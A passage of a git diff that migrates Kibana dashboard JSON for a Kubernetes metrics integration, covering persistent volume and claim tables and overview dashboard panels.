"8d5b3307-5817-411c-a1a4-dc2cc0a8b08c", + "98d34e0f-186a-47a7-8fa3-de5123d43616", + "420939ad-d9f0-43ee-a1a6-9b9fe5509086", + 
"546bc1ba-c988-42f6-9d4d-3da5f21cff36" + ], + "columns": { + "420939ad-d9f0-43ee-a1a6-9b9fe5509086": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Capacity", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.persistentvolume.capacity.bytes" }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false + "546bc1ba-c988-42f6-9d4d-3da5f21cff36": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Storage Class", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.persistentvolume.storage_class" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "14993ee2-7277-4012-946c-fa294f024a39", - "w": 48, - "x": 0, - 
"y": 0 - }, - "panelIndex": "14993ee2-7277-4012-946c-fa294f024a39", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.6.0-SNAPSHOT" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-e8ede311-8955-4a16-bf44-8c0ff0e0104b", - "type": "index-pattern" + "8d5b3307-5817-411c-a1a4-dc2cc0a8b08c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "1b2422f5-7bbd-4173-ae8f-17b87d3dbd29", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "e8ede311-8955-4a16-bf44-8c0ff0e0104b": { - "columnOrder": [ - "8d5b3307-5817-411c-a1a4-dc2cc0a8b08c", - "98d34e0f-186a-47a7-8fa3-de5123d43616", - "420939ad-d9f0-43ee-a1a6-9b9fe5509086", - "546bc1ba-c988-42f6-9d4d-3da5f21cff36" - ], - "columns": { - "420939ad-d9f0-43ee-a1a6-9b9fe5509086": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Capacity", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.persistentvolume.capacity.bytes" - }, - "546bc1ba-c988-42f6-9d4d-3da5f21cff36": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Storage Class", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.persistentvolume.storage_class" - }, - "8d5b3307-5817-411c-a1a4-dc2cc0a8b08c": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Name", - "operationType": "terms", - 
"params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.persistentvolume.name" - }, - "98d34e0f-186a-47a7-8fa3-de5123d43616": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Phase", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.persistentvolume.phase" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "1b2422f5-7bbd-4173-ae8f-17b87d3dbd29", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.state_persistentvolume", - "kubernetes.state_persistentvolumeclaim" - ], - "type": "phrases", - "value": [ - "kubernetes.state_persistentvolume", - "kubernetes.state_persistentvolumeclaim" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_persistentvolume" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_persistentvolumeclaim" - } - } - ] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "columns": [ - { - "columnId": "8d5b3307-5817-411c-a1a4-dc2cc0a8b08c", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "98d34e0f-186a-47a7-8fa3-de5123d43616", - "isTransposed": false - }, - { - "columnId": "420939ad-d9f0-43ee-a1a6-9b9fe5509086", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "546bc1ba-c988-42f6-9d4d-3da5f21cff36", - "isTransposed": false - } - ], - "layerId": 
"e8ede311-8955-4a16-bf44-8c0ff0e0104b", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.persistentvolume.name" }, - "title": "Persistent Volumes Informations [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 9, - "i": "e6032561-b325-41fe-b7f5-6b167d58dc18", - "w": 48, - "x": 0, - "y": 4 - }, - "panelIndex": "e6032561-b325-41fe-b7f5-6b167d58dc18", - "title": "Persistent Volumes Informations [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "98d34e0f-186a-47a7-8fa3-de5123d43616": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Phase", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.persistentvolume.phase" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "1b2422f5-7bbd-4173-ae8f-17b87d3dbd29", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.state_persistentvolume", + "kubernetes.state_persistentvolumeclaim" + ], + "type": "phrases", + "value": [ + "kubernetes.state_persistentvolume", + "kubernetes.state_persistentvolumeclaim" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_persistentvolume" + } + }, + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_persistentvolumeclaim" + } + } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "8d5b3307-5817-411c-a1a4-dc2cc0a8b08c", + "isTransposed": false + }, + { + "alignment": "right", + 
"columnId": "98d34e0f-186a-47a7-8fa3-de5123d43616", + "isTransposed": false + }, + { + "columnId": "420939ad-d9f0-43ee-a1a6-9b9fe5509086", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "546bc1ba-c988-42f6-9d4d-3da5f21cff36", + "isTransposed": false + } + ], + "layerId": "e8ede311-8955-4a16-bf44-8c0ff0e0104b", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-e8ede311-8955-4a16-bf44-8c0ff0e0104b", - "type": "index-pattern" + "title": "Persistent Volumes Informations [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Persistent Volumes Informations [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "e03df747-8a68-4d68-a958-1f0e38218859", + "w": 48, + "x": 0, + "y": 13 + }, + "panelIndex": "e03df747-8a68-4d68-a958-1f0e38218859", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-e8ede311-8955-4a16-bf44-8c0ff0e0104b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2503a179-a67c-4db4-a091-84e1d54aa5a9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e8ede311-8955-4a16-bf44-8c0ff0e0104b": { + "columnOrder": [ + "7b08988e-0df9-450c-89d0-b1d71c49a7ec", + "b15e8116-d875-4e7f-97f5-448ab367e5e1", + "1398ca11-cb70-4d9d-bacf-b402bf000905", + "457a059e-0824-4109-9178-6802eed70599", + "388ad9b8-3fec-4e8d-9a13-d950d646bd5b", + "6f4b28cd-dd85-41da-9921-af5faf9f33f8" + ], + "columns": { + "1398ca11-cb70-4d9d-bacf-b402bf000905": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Volume", + "operationType": "last_value", + "params": 
{ + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.persistentvolumeclaim.volume_name" + }, + "388ad9b8-3fec-4e8d-9a13-d950d646bd5b": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Access Mode", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.persistentvolumeclaim.access_mode" + }, + "457a059e-0824-4109-9178-6802eed70599": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Capacity", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } }, - { - "id": "metrics-*", - "name": "2503a179-a67c-4db4-a091-84e1d54aa5a9", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "e8ede311-8955-4a16-bf44-8c0ff0e0104b": { - "columnOrder": [ - "7b08988e-0df9-450c-89d0-b1d71c49a7ec", - "b15e8116-d875-4e7f-97f5-448ab367e5e1", - "1398ca11-cb70-4d9d-bacf-b402bf000905", - "457a059e-0824-4109-9178-6802eed70599", - "388ad9b8-3fec-4e8d-9a13-d950d646bd5b", - "6f4b28cd-dd85-41da-9921-af5faf9f33f8" - ], - "columns": { - "1398ca11-cb70-4d9d-bacf-b402bf000905": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Volume", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.persistentvolumeclaim.volume_name" - }, - "388ad9b8-3fec-4e8d-9a13-d950d646bd5b": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Access Mode", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.persistentvolumeclaim.access_mode" - }, - "457a059e-0824-4109-9178-6802eed70599": { - 
"customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Capacity", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.persistentvolumeclaim.request_storage.bytes" - }, - "6f4b28cd-dd85-41da-9921-af5faf9f33f8": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Storage Class", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.persistentvolumeclaim.storage_class" - }, - "7b08988e-0df9-450c-89d0-b1d71c49a7ec": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.persistentvolumeclaim.name" - }, - "b15e8116-d875-4e7f-97f5-448ab367e5e1": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Phase", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.persistentvolumeclaim.phase" - } - }, - "incompleteColumns": {} - } - } - } + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.persistentvolumeclaim.request_storage.bytes" + }, + "6f4b28cd-dd85-41da-9921-af5faf9f33f8": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Storage Class", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": 
"kubernetes.persistentvolumeclaim.storage_class" + }, + "7b08988e-0df9-450c-89d0-b1d71c49a7ec": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "2503a179-a67c-4db4-a091-84e1d54aa5a9", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.state_persistentvolume", - "kubernetes.state_persistentvolumeclaim" - ], - "type": "phrases", - "value": [ - "kubernetes.state_persistentvolume", - "kubernetes.state_persistentvolumeclaim" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_persistentvolume" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_persistentvolumeclaim" - } - } - ] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "alignment": "left", - "columnId": "7b08988e-0df9-450c-89d0-b1d71c49a7ec", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "b15e8116-d875-4e7f-97f5-448ab367e5e1", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "1398ca11-cb70-4d9d-bacf-b402bf000905", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "6f4b28cd-dd85-41da-9921-af5faf9f33f8", - "isTransposed": false - }, - { - "columnId": "457a059e-0824-4109-9178-6802eed70599", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "388ad9b8-3fec-4e8d-9a13-d950d646bd5b", - "isTransposed": false - } - ], - "layerId": "e8ede311-8955-4a16-bf44-8c0ff0e0104b", - "layerType": "data", - "rowHeight": "single", - 
"rowHeightLines": 1 - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.persistentvolumeclaim.name" }, - "title": "Persistent Volume Claims Informations [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 9, - "i": "e03df747-8a68-4d68-a958-1f0e38218859", - "w": 48, - "x": 0, - "y": 13 - }, - "panelIndex": "e03df747-8a68-4d68-a958-1f0e38218859", - "title": "Persistent Volume Claims Informations [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] PV/PVC", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-01-11T14:23:21.848Z", - "id": "kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "e6032561-b325-41fe-b7f5-6b167d58dc18:indexpattern-datasource-layer-e8ede311-8955-4a16-bf44-8c0ff0e0104b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e6032561-b325-41fe-b7f5-6b167d58dc18:1b2422f5-7bbd-4173-ae8f-17b87d3dbd29", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e03df747-8a68-4d68-a958-1f0e38218859:indexpattern-datasource-layer-e8ede311-8955-4a16-bf44-8c0ff0e0104b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e03df747-8a68-4d68-a958-1f0e38218859:2503a179-a67c-4db4-a091-84e1d54aa5a9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_4623b3fb-e2bc-4f1e-8cd3-0f0a753a171e:optionsListDataView", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_24514d41-0fa1-4fc5-96a1-6297453134bd:optionsListDataView", - "type": "index-pattern" + "b15e8116-d875-4e7f-97f5-448ab367e5e1": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Phase", + "operationType": "last_value", + "params": { + 
"showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.persistentvolumeclaim.phase" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "2503a179-a67c-4db4-a091-84e1d54aa5a9", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.state_persistentvolume", + "kubernetes.state_persistentvolumeclaim" + ], + "type": "phrases", + "value": [ + "kubernetes.state_persistentvolume", + "kubernetes.state_persistentvolumeclaim" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_persistentvolume" + } + }, + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_persistentvolumeclaim" + } + } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "left", + "columnId": "7b08988e-0df9-450c-89d0-b1d71c49a7ec", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "b15e8116-d875-4e7f-97f5-448ab367e5e1", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "1398ca11-cb70-4d9d-bacf-b402bf000905", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "6f4b28cd-dd85-41da-9921-af5faf9f33f8", + "isTransposed": false + }, + { + "columnId": "457a059e-0824-4109-9178-6802eed70599", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "388ad9b8-3fec-4e8d-9a13-d950d646bd5b", + "isTransposed": false + } + ], + "layerId": "e8ede311-8955-4a16-bf44-8c0ff0e0104b", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "Persistent Volume Claims Informations [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": 
"lens" }, - { - "id": "metrics-*", - "name": "controlGroup_16f1ca8d-0221-4df5-ae59-42a0e0f92992:optionsListDataView", - "type": "index-pattern" - } + "title": "Persistent Volume Claims Informations [Metrics Kubernetes]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Kubernetes] PV/PVC", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "e6032561-b325-41fe-b7f5-6b167d58dc18:indexpattern-datasource-layer-e8ede311-8955-4a16-bf44-8c0ff0e0104b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e6032561-b325-41fe-b7f5-6b167d58dc18:1b2422f5-7bbd-4173-ae8f-17b87d3dbd29", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e03df747-8a68-4d68-a958-1f0e38218859:indexpattern-datasource-layer-e8ede311-8955-4a16-bf44-8c0ff0e0104b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e03df747-8a68-4d68-a958-1f0e38218859:2503a179-a67c-4db4-a091-84e1d54aa5a9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_4623b3fb-e2bc-4f1e-8cd3-0f0a753a171e:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_24514d41-0fa1-4fc5-96a1-6297453134bd:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_16f1ca8d-0221-4df5-ae59-42a0e0f92992:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c.json b/packages/kubernetes/kibana/dashboard/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c.json index f7781716d29..f95059fffbc 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c.json 
@@ -1,3237 +1,3312 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"748291db-2826-4242-9107-9a5226733a06\":{\"order\":0,\"width\":\"large\",\"grow\":false,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"748291db-2826-4242-9107-9a5226733a06\",\"enhancements\":{},\"selectedOptions\":[]}},\"2da8af79-7928-4741-8d03-866642f3c2a0\":{\"order\":1,\"width\":\"large\",\"grow\":false,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace\",\"id\":\"2da8af79-7928-4741-8d03-866642f3c2a0\",\"selectedOptions\":[],\"enhancements\":{}}}}" + "id": "kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI1NSwyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "oneLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"748291db-2826-4242-9107-9a5226733a06\":{\"order\":0,\"width\":\"large\",\"grow\":false,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster 
Name\",\"id\":\"748291db-2826-4242-9107-9a5226733a06\",\"enhancements\":{},\"selectedOptions\":[]}},\"2da8af79-7928-4741-8d03-866642f3c2a0\":{\"order\":1,\"width\":\"large\",\"grow\":false,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace\",\"id\":\"2da8af79-7928-4741-8d03-866642f3c2a0\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Overview of Kubernetes cluster metrics", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "f1541205-b6eb-45a6-bdc5-9aaefa62af66", + "w": 33, + "x": 0, + "y": 0 }, - "description": "Overview of Kubernetes cluster metrics", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "panelIndex": "f1541205-b6eb-45a6-bdc5-9aaefa62af66", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes 
Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "title": "Kubernetes Dashboards [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "ace0daf9-5db7-44e5-9fc3-a1b1976b01c2", + "w": 15, + "x": 33, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false - }, - 
"title": "", - "type": "markdown", - "uiState": {} + "panelIndex": "ace0daf9-5db7-44e5-9fc3-a1b1976b01c2", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 10, + "markdown": "This dashboard requires having [`kube-state-metrics`](https://github.com/kubernetes/kube-state-metrics#kubernetes-deployment) deployed to your Kubernetes cluster to function properly. \nCheck the **Section: state_\\* and event** of the [Elastic Kubernetes integration](https://docs.elastic.co/en/integrations/kubernetes).", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" + }, + "title": "Information" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "33530265-ff62-49e7-9518-f430efb0dde0", + "w": 8, + "x": 0, + "y": 4 + }, + "panelIndex": "33530265-ff62-49e7-9518-f430efb0dde0", + "embeddableConfig": { + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "0fa53a1e-0589-4380-b700-70dd489a33de": { + "allowNoIndex": false, + "fieldAttrs": {}, + 